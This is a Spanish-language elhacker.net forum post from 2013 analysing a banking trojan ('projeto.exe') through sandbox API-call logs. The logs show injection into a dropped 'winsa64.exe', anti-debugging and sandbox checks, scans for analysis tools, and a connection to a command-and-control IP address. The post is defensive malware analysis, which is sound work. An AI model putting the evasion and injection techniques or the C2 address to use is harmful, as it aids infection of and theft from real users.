elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 ... 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 [89] 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 ... 123
881  Seguridad Informática / Análisis y Diseño de Malware / Re: Troyano bancario II (diferente configuración). en: 16 Febrero 2013, 14:40 pm
Análisis del archivo "projeto.exe":

Código:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\Projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ResumeThread() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(Projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(dbghelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(SbieDll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(wsock32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateEvent(ShellCopyEngineRunning) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetComputerName() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateEvent(ShellCopyEngineFinished) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateProcess((null),C:\WINDOWS\winsa64.exe,C:\WINDOWS) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\apphelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
WriteProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ExitProcess(0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
Executing: c:\windows\winsa64.exe
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,103000,PAGE_READWRITE) [c:\windows\winsa64.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
LoadLibrary(user32.dll) [c:\windows\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\windows\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\windows\winsa64.exe]
LoadLibrary(ole32.dll) [c:\windows\winsa64.exe]
LoadLibrary(version.dll) [c:\windows\winsa64.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(gdi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(wininet.dll) [c:\windows\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\windows\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\windows\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\windows\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\windows\winsa64.exe]
LoadLibrary(lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\windows\winsa64.exe]
VirtualQueryEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(Kernel32) [c:\windows\winsa64.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\winsa64.exe]
OpenProcessToken(C:\WINDOWS\winsa64.exe) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\winsa64.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ResumeThread() [c:\windows\winsa64.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\windows\winsa64.exe]
OpenProcess(winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(USER32) [c:\windows\winsa64.exe]
LoadLibrary(imm32.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\winsa64.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_NOACCESS) [c:\windows\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\windows\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\windows\winsa64.exe]
BitBlt() [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(version.dll) [c:\windows\winsa64.exe]
FreeLibrary() [c:\windows\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\windows\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\windows\winsa64.exe]
LoadLibrary(shell32.dll) [c:\windows\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\windows\winsa64.exe]
LoadLibrary(hnetcfg.dll) [c:\windows\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\windows\winsa64.exe]
LoadLibrary(dnsapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\winrnr.dll) [c:\windows\winsa64.exe]
LoadLibrary(wldap32.dll) [c:\windows\winsa64.exe]
LoadLibrary(rasadhlp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(ws2_32.dll) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]

Descarga dos archivos, "winsa64.exe" y el archivo "winsa64.cfg" que contiene el dominio no-ip asociado:



Análisis del archivo "winsa64.exe" (Api Log):

Código:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
ResumeThread() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateEvent(ShellCopyEngineRunning) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetComputerName() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateEvent(ShellCopyEngineFinished) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateProcess((null),C:\WINDOWS\winsa64.exe,C:\WINDOWS) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
WriteProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
ExitProcess(0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
Executing: c:\windows\winsa64.exe
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,103000,PAGE_READWRITE) [c:\windows\winsa64.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(iexplore.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(firefox.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
